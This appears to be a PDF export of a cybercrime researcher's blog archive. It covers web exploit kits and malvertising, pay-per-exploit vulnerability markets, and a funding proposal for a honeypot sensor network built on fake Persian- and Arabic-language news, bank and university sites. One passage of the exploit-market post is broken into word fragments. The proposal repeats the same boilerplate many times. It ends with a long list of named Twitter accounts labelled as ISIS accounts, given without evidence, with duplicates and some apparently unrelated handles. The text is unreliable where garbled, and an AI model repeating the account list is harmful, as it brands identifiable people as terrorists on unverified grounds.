economies of scale means once again, it’s worth mentioning Storm’s approach of having an already infected host

act as an infection vector itself, compared to its authors having to register multiple domains and change them

periodically. The result is malware embedded links exploiting client-side vulnerabilities in the form of an IP address,

in this case an already infected host that’s now aiming to infect another one
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• Automatically Exploiting Web Application Vulnerabilities – Mass SQL Injection Attacks

As I’ve already pointed out, malicious parties are not just efficiently scanning for remotely exploitable web application

vulnerabilities or looking for ways to remotely include files on any random host, they’ve started putting efforts into

analyzing the page rank, and overall popularity of a site they could exploit. This prioritizing of the sites to be used for

a “pull” tactic is aiming to achieve the highest possible success rate by targeting a high-trafficked site, where even

though the attack can be detected, the “window of opportunity” while the users were also accessing the malicious

server could be far more beneficial than having a permanent malware link on a less popular site for an indefinite

period of time.

• Malicious Advertisements - Malvertising

Among the most popular traffic acquisition tactics nowadays remain the active utilization of legitimate Web properties

for the purpose of socially engineering an ad network provider into featuring a specific malware-serving advertising

at the targeted Web site including active Web site compromise for the purpose of injecting rogue and malicious ads

on the targeted host.

Related posts:

• [4]Historical OSINT - Malicious Malvertising Campaign, Spotted at FoxNews, Serves Scareware

• [5]Cybercriminals Launch Malicious Malvertising Campaign, Thousands of Users Affected

• [6]Managed SWF Injection Cybercrime-friendly Service Fuels Growth Within the Malvertising Market Segment

• Buying Access to Hacked Cpanels or Web Servers

Thanks to a vibrant DIY (do-it-yourself) Web malware exploitation kit culture including the active utilization of various

DIY Web site exploitation and malware-generating cybercriminals continue actively utilizing stolen and compromised

accounting data for the purpose of injecting malicious scripts on the targeted host further compromising the confi-

dentiality availability and integrity of the targeted host.

• Harvesting accounting data from malware infected hosts

Having an administrator access to a domains portfolio, or any type of access though a web application backdoor or

direct FTP/SSH, has reached its commercial level a long time ago. In fact, differentiated pricing applies in this case,

on the basis of a site’s page rank, whereas I’ve stumbled upon great examples of “underground goods liquidity” as

a process, where access to a huge domains portfolio though a hacked Cpanels is being offered for cents with the

seller’s main concern that cents are better than nothing, nothing in the sense that she may loose access to the Cpanel

before its being sold and thus ends up with nothing. Now, let’s discuss the most popular malware exploitation kits

currently in the wild.

The Most Popular Web Malware Exploitation Kits

Going into detail about the most common vulnerabilities used in the multitude of web malware exploitation

kits could be irrelevant from the perspective of their current state of “modularity”, that is, once the default installa-

tion of the kit contains a rather modest set of exploits, the possibility to add new exploits to be used has long reached

the point’n’click stage. Even worse, localizing the kits to different languages further contributes to their easy of use

and acceptance on a large scale, just as is their open source nature making it easy for coders to use a successful kit’s

modules as a foundation for a new one – something’s that’s happening already, namely the different between a

copycat kit and an original coded from scratch one. Among the most popular malware kits remain :
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• A Brief Overview of MPack, IcePack, Zunker, Advanced Pack and Fire Pack

During 2007, Mpack emerged as the most popular malware exploitation kit. Originally available for purchase, by

the time copies of the kit started leaking out, anyone from a script kiddie to a pragmatic attacker have obtained

copy of it. Mpack’s main strength is that of its well configured default installation, which in a combination with a

rather modest, but then again, modular set of exploits included, as well as its point’n’click level of sophistication

automatically turned it into the default malware kit. Mpack’s malware kit has been widely used on nearly all of the

high-profile malware embedded attacks during 2007, however, its popularity resulted in way too much industry

attention towards its workings, and therefore, malicious parties starting coming up with new kits, still using Mpack

as the foundation at least from a theoretical perspective.

The list is endless, the Nuclear Malware kit, Metaphisher, old version of the WebAttacker and the Rootlauncher kit,

with the latest and most advanced innovation named the Random JS Exploitation Kit. Compared to the previous one,

this one is going a step beyond the usual centralized malicious server.

With malicious parties now interested in controlling as much infected hosts with as little effort as possible,

client-side vulnerabilities will continue to be largely abused in an efficient way thought web malware exploitation

kits in 2008. The events that took place during 2007, clearly demonstrate the pragmatic attack approaches malicious

parties started applying, namely realizing that an outdated but unpatched on a large scale vulnerability is just as

valuable as a zero day one.

1. https://ddanchev.blogspot.com/2018/10/dancho-danchevs-2010-disappearance.html

2. https://speakerdeck.com/ddanchev/cesg-hp-cyberintel-dancho

3. https://ddanchev.blogspot.com/2017/05/historical-osint-inside-2007-2009.html

4. https://ddanchev.blogspot.com/2017/01/historical-osint-malicious-malvertising.html

5. https://ddanchev.blogspot.com/2016/04/cybercriminals-launch-malicious.html

6. https://ddanchev.blogspot.com/2016/08/managed-swf-injection-cybercrime.html

124





Pay-Per-Exploit Acquisition Vulnerability Programs - Pros and cons? (2018-10-22 17:47)

As [1]ZERODIUM starts paying premium rewards to security researchers to acquire their previously unreported zero-

day exploits affecting multiple operating systems software and/or devices a logical question emerges in the context of

the program’s usefulness the potential benefits including potential vulnerabilities within the actual acquisition process

- how would the program undermine the security industry and what would be the eventual outcome for the security

researcher in terms of

[2]fueling growth in the cyber warfare market segment

?
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Having greatly realized the potential of acquiring zero day vulnerabilities for the purpose of actively exploiting end

users malicious actors have long been aware of the [3]over-the-counter acquisition market model

further enhancing their capabilities when launching malicious campaigns. Among the most widely [4]spread myth

about zero day vulnerabilities is the fact that

[5]zero day vulnerabilities arethe primary growth factor of the cybercrime ecosystem

further resulting in a multi-tude of malicious activity targeting end users.
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126

and exploit

acquisition progr

ams successfully resulting in the l

aunch

and est

ablishment of third-p

arty services

and products further popul

ating the security-industry with rel

ated products

and services potenti

ally

acquiring "know-how"

and relev

ant vulner

ability

and exploit inform

ation from m

ajor vendors further l

aunching rel

ated comp

anies

and services potenti

ally empowering third-p

arty rese

archers vendors

and individu

als including n

ation-st

ate

actors with potenti

al we

aponiz

ation c

ap

127

abilities potenti

ally le

ading to successful t

arget-

acquisition pr

actices on beh

alf of third-p

arty rese

archers

and individu

als.

Becoming

a t

arget in the widespread

context of third-p

arty vendors

and rese

archers might not be the wisest

appro

ach when undermining potenti

al rese

arch

and in-house rese

arch

and benchm

arking

activities in terms of e v alu

ating

and responding to vulner

abilities

and exploits. Vendors looking for w

ays to efficiently improve the over

all security

and product perform

ance in terms of security should consider b

asic intern

128

al benchm

arking pr

actices and should also consider a possible incentive-based type of vulnerability and exploit reward-type of

revenue-sharing program potentially rewarding company employees and researchers with the necessary tools and

incentives to find and discover and report security vulnerabilities and exploits.

Something else worth pointing out in terms of vulnerability research and exploit discovery is a process which can be

best described as the life-cycle of a zero day vulnerability and exploit which can be best described as a long-run

process utilized by malicious and fraudulent actors successfully utilizing client-side exploits for the purpose of

successfully dropping malicious software on the hosts of the targeted victims which often rely on outdated and

patched vulnerabilities and the overall misunderstanding that zero day vulnerabilities and exploits are the primary





growth factor of the security-industry and will often rely on the fact that end users and enterprises are often

unaware of the basic fact that cybercriminals often rely on outdated and patched vulnerabilities successfully

targeting thousands of users globally on a daily basis.

What used to be a market-segment dominated by DIY (do-it-yourself) exploit and malware-generating tools is

today’s modern market-segment dominated by Web malware-exploitation kits successfully affecting thousands of

users globally on a daily basis. In terms of Web-malware exploitation kits among the most common misconceptions

regarding the utilization of such type of kits is the fact that the cybercriminals behind it rely on newly discovered

exploits and vulnerabilities which in fact rely on [6]outdated and already patched security vulnerabilities and

exploits for the purposes of successfully enticing thousands of users globally into falling victim into

social-engineering driven malicious and fraudulent campaigns.

Despite the evident usefulness from a malicious actor’s point of view when launching malicious campaigns malicious

actors continue utilizing outdated vulnerabilities for the purpose of launching malicious campaigns further utilizing a

multi-tude of social engineering attack vectors to enhance the usefulness of the exploitation vector. Another crucial

aspect of the pay-per-exploit acquisition vulnerability model is, the reliance on outdated and unpatchted

vulnerabilities for the purpose of launching malicious campaigns further relying on the basic fact that on the

majority of occasions end users fail to successfully update their third-party applications often exposing themselves

to a variety of successful malicious campaigns utilizing outdated and unpatched vulnerabilities.

We expect to continue observing an increase in the pay-per-exploit acquisition model with, related acquisition

model participants continuing to acquire vulnerabilities further fueling growth into the market segment. We expect

that malicious actors will adequately respond through over-the-counter acquisition models including the utilization

of outdated and unpatched vulnerabilities. End users are advised to continue ensuring that their third-party

applications are updated to build a general security awareness and to ensure that they’re running a fully patched

antivirus solution.

Consider going through the following related posts:

[7]Researchers spot new Web malware exploitation kit

[8]Web malware exploitation kits updated with new Java exploit

[9]Which are the most commonly observed Web exploits in the wild?

[10]Report: Patched vulnerabilities remain prime exploitation vector

[11]Report: malicious PDF files becoming the attack vector of choice

[12]Malvertising campaigns at multiple ad networks lead to Black Hole Exploit Kit

[13]56 percent of enterprise users using vulnerable Adobe Reader plugins

[14]Report: third party programs rather than Microsoft programs responsible for most vulnerabilities

[15]Report: malicious PDF files becoming the attack vector of choice
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[16]Malvertising campaigns at multiple ad networks lead to Black Hole Exploit Kit

[17]56 percent of enterprise users using vulnerable Adobe Reader plugins

[18]Report: third party programs rather than Microsoft programs responsible for most vulnerabilities

[19]Report: 64 % of all Microsoft vulnerabilities for 2009 mitigated by Least Privilege accounts

[20]Secunia: popular security suites failing to block exploits

[21]37 percent of users browsing the Web with insecure Java versions

[22]Which are the most commonly observed Web exploits in the wild?

[23]Report: Malicious PDF files comprised 80 percent of all exploits for 2009

[24]Secunia: Average insecure program per PC rate remains high

1. https://zerodium.com/program.html

2. https://www.webroot.com/blog/2013/12/27/cybercrime-trends-2013-year-review/

3. http://www.zdnet.com/article/black-market-for-zero-day-vulnerabilities-still-thriving/

4. https://www.zdnet.com/article/seven-myths-about-zero-day-vulnerabilities-debunked

5. https://www.zdnet.com/article/report-patched-vulnerabilities-remain-prime-exploitation-vector/

6.

https://www.zdnet.com/article/a-patched-browser-false-feeling-of-security-or-a-security-utopia-that-actu

ally-exists/

7. https://www.zdnet.com/article/researchers-spot-new-web-malware-exploitation-kit/

8. https://www.zdnet.com/blog/security/web-malware-exploitation-kits-updated-with-new-java-exploit/9849

9. https://www.zdnet.com/blog/security/which-are-the-most-commonly-observed-web-exploits-in-the-wild/10261

10. https://www.zdnet.com/blog/security/report-patched-vulnerabilities-remain-prime-exploitation-vector/8162

11. https://www.zdnet.com/article/report-malicious-pdf-files-becoming-the-attack-vector-of-choice/

12.

https://www.zdnet.com/article/malvertising-campaigns-at-multiple-ad-networks-lead-to-black-hole-exploit-

kit/

13. https://www.zdnet.com/article/56-percent-of-enterprise-users-using-vulnerable-adobe-reader-plugins/

14. https://www.zdnet.com/article/report-third-party-programs-rather-than-microsoft-programs-responsible-for

-most-vulnerabilities/

15. https://www.zdnet.com/article/report-malicious-pdf-files-becoming-the-attack-vector-of-choice/

16.

https://www.zdnet.com/article/malvertising-campaigns-at-multiple-ad-networks-lead-to-black-hole-exploit-

kit/

17. https://www.zdnet.com/article/56-percent-of-enterprise-users-using-vulnerable-adobe-reader-plugins/

18. https://www.zdnet.com/article/report-third-party-programs-rather-than-microsoft-programs-responsible-for

-most-vulnerabilities/

19. https://www.zdnet.com/article/report-64-of-all-microsoft-vulnerabilities-for-2009-mitigated-by-least-pri

vilege-accounts/

20. https://www.zdnet.com/article/secunia-popular-security-suites-failing-to-block-exploits/

21. https://www.zdnet.com/article/37-percent-of-users-browsing-the-web-with-insecure-java-versions/

22. https://www.zdnet.com/article/which-are-the-most-commonly-observed-web-exploits-in-the-wild/

23. https://www.zdnet.com/article/report-malicious-pdf-files-comprised-80-percent-of-all-exploits-for-2009/

24. https://www.zdnet.com/article/secunia-average-insecure-program-per-pc-rate-remains-high/
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Cyber Security Project Investment Proposal - DIA Needipedia - Fight Cybercrime and Cyber Jihad With

Sensors - Grab Your Copy Today! (2018-12-16 13:52)

Dear blog readers, I decided to share with everyone a currently pending project investment proposal regarding the

upcoming launch of a proprietary Technical Collection analysis platform with the project proposal draft available on

request part of [1]DIA’s Needipedia Project Proposal Investment draft or eventually through the [2]Smith Richardson Foundation.

In case you’re interested in working with me for the purpose of implementing the project solution including a

possible investment proposal on your behalf – that also includes a possible VC or an angel investor introduction – I

can be reached at dancho.danchev@hush.com

Looking forward to receiving your comments questions feedback and general remarks including possible in-

vestment proposal requests. Happy Holidays!

Enjoy!

01. Executive summary

The Obmonix platform aims to build the world’s most versatile and comprehensive sensor network for intercepting

cybercrime and cyber jihad activity on a global scale successfully positioning the project as a leading in-house built

provider for actionable intelligence within the Intelligence Community.

02. What are you trying to do?

The Obmonix platform aims to build the world’s most versatile and comprehensive sensor network for intercepting
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cybercrime and cyber jihad activity successfully positioning the platform as a leading in-house provider of actionable

intelligence within the Intelligence Community.

03. How is it currently done?

Largely relying on a selected set of outsourced intelligence-gathering providers the Intelligence Community overall

reliance on commercial intelligence gathering providers has successfully positioned the Intelligence Community with

a limited sight in terms of pro-active and systematic response to cybercrime and cyber jihad events globally.

04. What’s new?

Largely relying on the utilization of multiple interception vectors including hybrid-based type of sensor networks the

Intelligence Community is successfully positioned to successfully intercept and proactively respond to a growing set

of cybercrime and cyber jihad events globally.

05. Who cares?

The Intelligence Community largely positioned to take advantage of a growing set of technologies for the purpose

of pro-actively responding to a growing set of cybercrime and cyber jihad events globally is ultimately empowered

to take advantage of modern hybrid-based type of sensor networks for the purpose of successfully intercepting and

responding to a growing set of cybercrime and cyber jihad events globally.

06. What are the risks?

Successfully positioning the provider as a leading provider for actionable intelligence in terms of cybercrime and

cyber jihad events globally within the Intelligence Community will successfully position the Obmonix platform and

its operator as a leading provider of actionable intelligence within the Intelligence Community.

Transmittal Letter

My name is Dancho Danchev I’m an internationally recognized cybercrime researcher security blogger and

threat intelligence analyst currently maintaining some of the industry’s leading threat intelligence gathering

information-sharing resources having successfully contributed to the overall demise of cybercrime internationally

having successfully monitored analyzed and processed some of the industry’s major nation-state and malicious actor

type of malicious campaigns over the last decade leading me to a successful career as a cybercrime researcher

security blogger and threat intelligence analyst leading me to a successful launch of my newly launched startup

named Disruptve Individuals and the Obmonix - Cybercrime and Cyber Jihad Fighting Sensor Network.
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Having successfully pioneered my own methodology for processing threat intelligence data including active

dissemination of threat intelligence data to a variety of sources including an in-depth understanding of the Intel-

ligence Cycle I’m certain that based on my experience the time has come to establish a professional and working

relationship with a government-private sector enterprise leading me to a successful project proposal within the

Intelligence Community and the security industry.

My initial goal for submitting a project proposal is to ensure that the Intelligence Community remains on the

top of its game and that the United States remains ahead of adversaries looking to profit from its economic might

including the successful compromise of its infrastructure potentially targeting the life’s and well-being of its citizens

globally.

Largely relying on a set of industry-leading contacts my initial idea is to ensure that the Intelligence Commu-

nity remains actively empowered with the world’s largest and most comprehensive platform for monitoring profiling

and proactively responding to malicious nation-state malicious actors type of cybercrime and cyber-jihad activity

globally through the successful establishing of a government-private sector type of partnership leading me to a

successful launch of my own company leading me to a successful project-based type of project proposal.

Having actively contributed to the overall demise of cybercrime internationally through the last decade I’m

certain that my expertise ambition and expertise in the field will successfully contribute to the Intelligence Commu-

nity’s overall mission including a currently active project within the Intelligence Community and the security industry.

I sincerely hope that my project proposal will be eventually funded leading me to become an active partici-

pant within the Intelligence Community with a currently active project within the Intelligence Community and the

security-industry.
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Company Overview

The following brief will provide a detailed summary of the company overview including key success factors

and a project taxonomy.

Disruptive Individuals is a research-intensive data-driven company successfully establishing the world’s largest
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snapshot of malicious cybercrime activity for the purpose of offering the industry the world’s most versatile portfolio of malicious cybercrime-driven services successfully positioning itself as the world’s leading provider of real- time

intelligence-driven services and product portfolio including cybercrime-research data malicious activity profiling

services and custom-tailored intelligence assessments successfully positioning the company as the world’s leading

provider of cybercrime-data driven research-intensive intelligence data-driven company.

Key Success Factors

• the platform will be ultimately capable of establishing the industry’s largest data set of cybercrime activity

for the purpose of real-time monitoring and profiling of malicious cybercrime activity successfully infiltrating

the majority of cybercrime forum communities successfully establishing the foundations for an intelligence

gathering process

• the platform will be ultimately capable of real-time forum data localization for the purpose of successfully es-

tablishing the foundations for a successful intelligence gathering process

• the platform will be ultimately capable of establishing the foundations for real-time monitoring and profiling

of malicious activity including forum member data successfully establishing the foundations for a successful

intelligence gathering process

• the platform will be ultimately capable of establishing the world’s largest data set of historical cybercrime activity

successfully establishing the foundations for a successful intelligence gathering process

Return on Investment

• research-based forum activity driven intelligence feeds

• the company will be ultimately capable of offering subscription based type of intelligence driven services in-

cluding intelligence and data-driven cybercrime and malicious-activity capable feeds

• community-driven data processing capabilities

• the company will be ultimately capable of offering public feeds to include the necessary data for the purpose of

establishing an active community-based intelligence-data driven type of intelligence-data driven type of services

and feeds

• intelligence feed subscription type of managed intelligence-feed driven services

• the company will be ultimately capable of offering tailored intelligence-driven data feeds successfully empower-

ing security enthusiasts security experts researchers and government contractors with the necessary data and

expertise to offer an insight into the company’s vast network of data and intelligence driven type of services

Company Data Project Taxonomy

This intelligence brief will details the basic company project taxonomy structure for the purpose of establishing the

foundations for a successful data and intelligence-driven type of research based type of cybercrime and malicious-

activity tracking activity to include but not limited to cybercrime community forum data and active social media mon-

itoring and, profiling capabilities.

Cybercrime Sensor Network
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This intelligence brief will details the basic company project taxonomy structure for the purpose of establishing the foundations for a successful data and intelligence-driven type of research based type of cybercrime and malicious-activity tracking activity to include but not limited to cybercrime community forum data and active social media mon-

itoring and profiling capabilities.

Spam Message

• spam source

• spam message

• nation-state actors

• malicious-adversaries

• country

• hosting provider

• ASN

• IP reputation

• message

• embedded URL

• embedded attachment

Phishing Message

• phishing source

• phishing message

• nation-state

• malicious-actors

• spear-phishing

• targeted-attack

• country

• hosting provider

• ASN

• IP reputation

• message

• embedded URL

• embedded attachment
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Malicious Software

• nation-state actors

• malicious-adversaries

• C &C phone back location

• country

• hosting location

• ASN

• screenshot

• malicious MD5

Malicious URL

• nation-state actors

• malicious-adversaries

• country

• hosting provider

• ASN

• client-side exploitation

• client-side exploit sample

Android malware

• nation-state actors

• malicious-adversaries

• C &C phone back

• country

• hosting provider

• ASN

• SMS feature

• Screenshot

• malicious MD5

138

Mac OS X malware

• nation-state actors

• malicious-adversaries

• C &C phone back

• country

• hosting provider

• ASN

• Screenshot

• malicious MD5

Explanation of Honeypot Technology

Honeypot technology greatly ensures that actionable and real-time data of jihadist activities can be acquired profiled

and analyzed acting as an early warning system for jihadist activity online.It relies on the systematic positioning of

misconfigured network devices to better allow the use of monitoring sensors attracting malicious traffic leading to an

eventual compromise allowing for better understanding of the motivation and capability estimation of the attacker

including active motivation and capabilities type of attribution leading to the production of actionable real-time type

of intelligence type of research and analysis type of data.

Honepot Deployment Strategy

Honeypot technology greatly ensures that actionable and real-time data of jihadist activities can be acquired profiled

and analyzed acting as an early warning system for jihadist activity online.

• Fake Newspaper - Al-Jihah

The initial idea behind setting up a fake newspaper (in Persian, Arabic) would be to establish the foundation for a

successful deceptive early warning system sensor further ensuring that actionable and real-time jihadist activity data

can be collected profiled and interpreted for producing real-time intelligence summary reports. Daily updates with

pro-jihadist material would ensure the quality acquisition of traffic including potential deceptive campaigns to be

intercepted profiled an analyzed acting as an early warning system sensor further ensuring the collection of actionable

real-time jihadist activities data.

The Al-Jilah newspaper would act as a central repository for, various anti-jihad content successfully positioning the

paper as a primary attack target for cyber jihadist online successfully increasing the probability for a successful attack

and eventually collecting and interpreting the attack data. The Al-Jilah newspaper would act as a central repository

of anti-jihad content and would be localized in Persian in Arabic successfully penetrating local and highly segmented

markets for the purpose of increasing the probability of a successful attack.

Various public placement strategy in terms of positioning the honeypot technology within the eventual attack

compromise activity would include active search engine optimization techniques successfully leading to a great

degree of capability estimation attack traffic and would also result in eventual direct forum placement within various

prominent jihadist activity online forum communities.
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• Fake Bank – Arabah Financing

The initial idea behind setting up a fake bank (in Persian, Arabic) would be to establish the foothold of a deceptive

campaign ensuring the collection of actionable real-time time jihadist data to be analyzed and profiled. Successfully

positioning the bank within the network assets acquisition would ensure the collection of actionable and real-time

jihadist data further ensuring the successful interception of jihadist activities online.

The initial idea behind setting up a fake bank would be to successfully position a fake Web site successfully resulting

in the active deployment of honeypot appliance technologies for the purpose of monitoring and profiling various

jihadist activity online. Successfully setting up a fake bank in Persian and Arabic would result in the active penetration

of various market segment properties successfully resulting in the active profiling and monitoring of jihadist activity

online.

Successfully setting up a fake bank would result in the active publication of content inter-related news releases

emphasizing on major localized and segment released type of content successfully resulting in the active profiling

and monitoring of various jihadist activity online.Successful positioning in terms of points of contact would ensure

active phishing and malware attack profiling and monitoring successfully resulting in active profiling and monitoring

of jihadist activity online.

• Fake university – Abkazah University

The initial idea behind setting up a fake university (in Persian, Arabic) would be to establish the foothold of a deceptive

campaign ensuring the collection of actionable real-time time jihadist data to be analyzed and profiled. Successfully

positioning the bank within the network assets acquisition would ensure the collection of actionable and real-time

jihadist data further ensuring the successful interception of jihadist activities online.Successful positioning in terms

of points of contact would ensure active phishing and malware attack profiling and monitoring successfully resulting

in active profiling and monitoring of jihadist activity online.

The initial idea of setting up a fake university would result in the active profiling and monitoring of various jihadist

community type of jihadist activity online successfully positioning a localized in Persian and Arabic fake university

successfully resulting in the active profiling and monitoring of jihadist activity online. Sample fake university content

type of localized fake university portfolio of facilities and educational courses would result in the active positioning

for a localized and segmented active profiling and monitoring of jihadist activity online.

It would consist of active SCADA research and cyber security type of research and analysis facility allowing the active

monitoring of malicious activity, for the origin source country Iran, Pakistan, Saudi Arabia, Iraq and Syria.Successful

positioning in terms of points of contact would ensure active phishing and malware attack profiling and monitoring

successfully resulting in active profiling and monitoring of jihadist activity online.

• Fake Company – Ostan Industries

The initial idea behind setting up a fake company would be to successfully intercept and profile actionable real-time

jihadist activities online to successfully intercept and profile various jihadist activities online.The initial idea behind

setting up a fake company would be to position a SCADA type of infrastructure localized in Persian, Arabic for the

purpose of successfully profiling and monitoring various jihadist activity online.

With a successful placement and active content generating localized in Persian, Arabic a fake company deployment

using honeypot appliance technology would result in active capability estimation and profiling of various jihadist
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activity online.Successful positioning in terms of points of contact would ensure active phishing and malware attack profiling and monitoring successfully resulting in active profiling and monitoring of jihadist activity online.

Cyber Jihad Sensor Network

This intelligence brief will details the basic company project taxonomy structure for the purpose of establishing the

foundations for a successful data and intelligence-driven type of research based type of cybercrime and malicious-

activity tracking activity to include but not limited to cybercrime community forum data and active social media mon-

itoring and profiling capabilities.

• forum topic

the platform will be ultimately capable of processing a particular forum topic for the purpose of establishing the

foundations for a successful intelligence gathering process

• forum message

the platform will be ultimately capable of processing a particular forum message for the purpose of establishing the

foundations for a successful intelligence gathering process

• forum member

the platform will be ultimately capable of processing a particular forum member for the purpose of establishing the

foundations for a successful intelligence gathering process

• forum member message

the platform will be ultimately capable of processing a particular forum member message for the purpose of

establishing the foundations for a successful intelligence gathering process

• forum message

- the platform will be ultimately capable of processing a particular forum message for the purpose of establishing the

foundations for a successful intelligence gathering process

• forum message

- the platform will be ultimately capable of processing a particular forum external message for the purpose of

successfully establishing the foundations for a successful intelligence gathering process

• forum time

- the platform will be ultimately capable of processing a particular forum time for the purpose of establishing the

foundations for a successful intelligence gathering process
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• forum data

the platform will be ultimately capable of processing data including date time message url email ultimately establish-

ing the foundations for a successful intelligence gathering process

• forum URL

the platform will be ultimately capable of processing a particular forum URL further establishing the foundation for

the Obnomix platform further establishing the foundations for a successful intelligence gathering process

• forum media

the platform will be ultimately capable of processing forum media further establishing th foundations for the

Obnomix platform further establishing the foundations for a successful intelligence gathering process

• forum email

the platform will be ultimately capable of processing forum email further establishing the foundations for the

Obnomix platform further establishing the foundations for a successful intelligence gathering process

• forum contact

the platform will be ultimately capable of processing forum contact further establishing the foundations for the

Obnomix platform further establishing the foundations for a successful intelligence gathering process

Sample ISIS Social Media Twitter Accounts:

• https://twitter.com/As _soumaly

• https://twitter.com/wilayat _cairo56

• https://twitter.com/lSmisMUJAHlDAH

• https://twitter.com/islamdamas1980 40k

• https://twitter.com/HA _alshami03

• https://twitter.com/jundi71033868

• https://twitter.com/nor92331

• https://twitter.com/WmWmWm57

• https://twitter.com/tytxzxxz

• https://twitter.com/raisiiiiii

• https://twitter.com/FIIIIII2015
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• https://twitter.com/BrCdPrsnr

• https://twitter.com/leembfs2017

• https://twitter.com/Sheb84669751

• https://twitter.com/GMCTNT _1979

• https://twitter.com/i593162

• https://twitter.com/bela _hudood

• https://twitter.com/ _u _r7yok

• https://twitter.com/kalmat _haaq

• https://twitter.com/meersbo2

• https://twitter.com/iahmd61

• https://twitter.com/TurMedia316

• https://twitter.com/shamtu _33

• https://twitter.com/hoec15

• https://twitter.com/ll41lll

• https://twitter.com/AlJabarti45

• https://twitter.com/abo _roqaia82

• https://twitter.com/inmyheartisis

• https://twitter.com/gurababiz1551

• https://twitter.com/jhkghjy

• https://twitter.com/Hero _isis _711

• https://twitter.com/itc _hallo

• https://twitter.com/TurMedia316

• https://twitter.com/JUI _LJ

• https://twitter.com/SomQaeda

• https://twitter.com/TARLEE4

• https://twitter.com/Muj _93 _Hed

• https://twitter.com/dieebkhel

• https://twitter.com/HJdjdu

• https://twitter.com/anwartab

• https://twitter.com/SYRIA _GID

• https://twitter.com/Xkb038
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• https://twitter.com/MKoshur2

• https://twitter.com/abutalut8

• https://twitter.com/AEJKhalil

• https://twitter.com/abu2legend

• https://twitter.com/Gqeflfwlemqpdmf

• https://twitter.com/alhlby027

• https://twitter.com/SuehwShehe

• https://twitter.com/sdsdsd325245

• https://twitter.com/gffggll1

• https://twitter.com/ISIS _1979GMC

• https://twitter.com/dola24687

• https://twitter.com/timbosulli

• https://twitter.com/f75da586675f456

• https://twitter.com/khilafahinfos

• https://twitter.com/allbasra

• https://twitter.com/Muhaajirah _

• https://twitter.com/abufalahalhind4

• https://twitter.com/Saeed _alHalabi0

• https://twitter.com/iislamic12

• https://twitter.com/TaWhEeD _O

• https://twitter.com/avuOmar _shams

• https://twitter.com/abouanstunisi

• https://twitter.com/homsiia

• https://twitter.com/4 _7m0o0d

• https://twitter.com/ Djoiyriajw

• https://twitter.com/96176629289

• https://twitter.com/killer _cail99

• https://twitter.com/mfawas1

• https://twitter.com/ohatab8

• https://twitter.com/Ultrasmuslim1

• https://twitter.com/A05462492
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• https://twitter.com/azve76

• https://twitter.com/ClemStalDim

• https://twitter.com/mahmood

• https://twitter.com/aqill41

• https://twitter.com/iahmd61

• https://twitter.com/azve76

• https://twitter.com/PicotNo

• https://twitter.com/h _a _e _23

• https://twitter.com/goo _ias

• https://twitter.com/ _irl _toby6

• https://twitter.com/samha1o

• https://twitter.com/samha1o

• https://twitter.com/rdcongo _news

• https://twitter.com/hytegetydyte

• https://twitter.com/f75da586675f456

• https://twitter.com/Muj _93 _Hed

• https://twitter.com/abohashmily

• https://twitter.com/Alhareth _2

• https://twitter.com/wfsfsd

• https://twitter.com/FoopSeven

• https://twitter.com/azve77

• https://twitter.com/Ali _G303L

• https://twitter.com/R9O7GupXDM0b0pd

• https://twitter.com/georgebinto1

• https://twitter.com/nightwalker _74he

• https://twitter.com/ahmadvasvv565

• https://twitter.com/Ansar _AlSharia0

• https://twitter.com/Alsloli _dog/media

• https://twitter.com/inmyheartisis

• https://twitter.com/om _elbarae1

• https://twitter.com/saadsaudi2014
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• https://twitter.com/timotim91217281

• https://twitter.com/ii _o _01ru

• https://twitter.com/aljanady75

• https://twitter.com/Katz0UmAlBaraa0

• https://twitter.com/ _Mi _Sk _

• https://twitter.com/Misk _2 _a

• https://twitter.com/ISIS1995DD

• https://twitter.com/moohger121

• https://twitter.com/Omisshaq

• https://twitter.com/qatada _93

• https://twitter.com/Is _zarkiue

• https://twitter.com/Ali _G303L

• https://twitter.com/fgh959

• https://twitter.com/sdg42303540

• https://twitter.com/alptter _

• https://twitter.com/umaisha55

• https://twitter.com/algwsd2233

• https://twitter.com/dfgndf2

• https://twitter.com/leembfs2017

• https://twitter.com/wearekillkofar

• https://twitter.com/Om _islam47

• https://twitter.com/islamic _iso

• https://twitter.com/ _a _a _20

• https://twitter.com/truth _ee

• https://twitter.com/Fahad _Buhendi

• https://twitter.com/lmj _hallo

• https://twitter.com/er _er _500

• https://twitter.com/86Roben

• https://twitter.com/DsdsdsfSddsd

• https://twitter.com/abu _a _88

• https://twitter.com/sadkingp20
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• https://twitter.com/noor _sban6

• https://twitter.com/is5 _is5

• https://twitter.com/JUI _LJ

• https://twitter.com/qatada _9

• https://twitter.com/abo _al _zubair

• https://twitter.com/Othman14 _C4

• https://twitter.com/nedalo9314

• https://twitter.com/SamaIQ _ _90

• https://twitter.com/Mar44ma

• https://twitter.com/Manaln9

• https://twitter.com/phupeuea

• https://twitter.com/raisiiiiii

• https://twitter.com/aljanady75/

• https://twitter.com/ _Mi _Sk _

• https://twitter.com/Misk _2 _a

• https://twitter.com/ISIS1995DD

• https://twitter.com/moohger121

• https://twitter.com/198 _mazen

• https://twitter.com/CavalierDuSham

• https://twitter.com/SinaiTor

• https://twitter.com/NaserIS8

• https://twitter.com/oumme _aymen10

• https://twitter.com/gaznaya

• https://twitter.com/un _serviteur

• https://twitter.com/Tekindebeyvin

• https://twitter.com/ _DavidThomson

• https://twitter.com/VegetaMoustache

• https://twitter.com/MillatIbrahim1

• https://twitter.com/Hayati _LiLLah _

• https://twitter.com/Alitt1245

• https://twitter.com/salehalawlqi1
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• https://twitter.com/SimNasr

• https://twitter.com/xonraqqa

• https://twitter.com/aodaaoda4

• https://twitter.com/ _Mi _Sk _

• https://twitter.com/anwartab

• https://twitter.com/waswa0127

• https://twitter.com/ali523480

• https://twitter.com/Rhbdbd1

• https://twitter.com/AnsarAlSharia13

• https://twitter.com/AlJabarti46

• https://twitter.com/IslamiyaKurdi

• https://twitter.com/zayanepower

• https://twitter.com/WalaAndBara

• https://twitter.com/SFKIIIHHF _ _oO33

• https://twitter.com/AAdhim10

• https://twitter.com/MhdSayf

• https://twitter.com/abo _67 _omar

• https://twitter.com/DawlaBrulFrance

• https://twitter.com/strange76292811

• https://twitter.com/VbnIsrt

• https://twitter.com/IS _IS021

• https://twitter.com/IS _IS022

• https://twitter.com/AbdAllahGaza

• https://twitter.com/khilafah01 _

• https://twitter.com/iislamic12

• https://twitter.com/ajmurgent

• https://twitter.com/baqiya79R

• https://twitter.com/abujamaludeen02

• https://twitter.com/ibn _abdiqany

• https://twitter.com/killercat600

• https://twitter.com/MisciFromTheD
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• https://twitter.com/3aam _Al _Diri

• https://twitter.com/mnhtye

• https://twitter.com/block _151

• https://twitter.com/Hijazi _9111

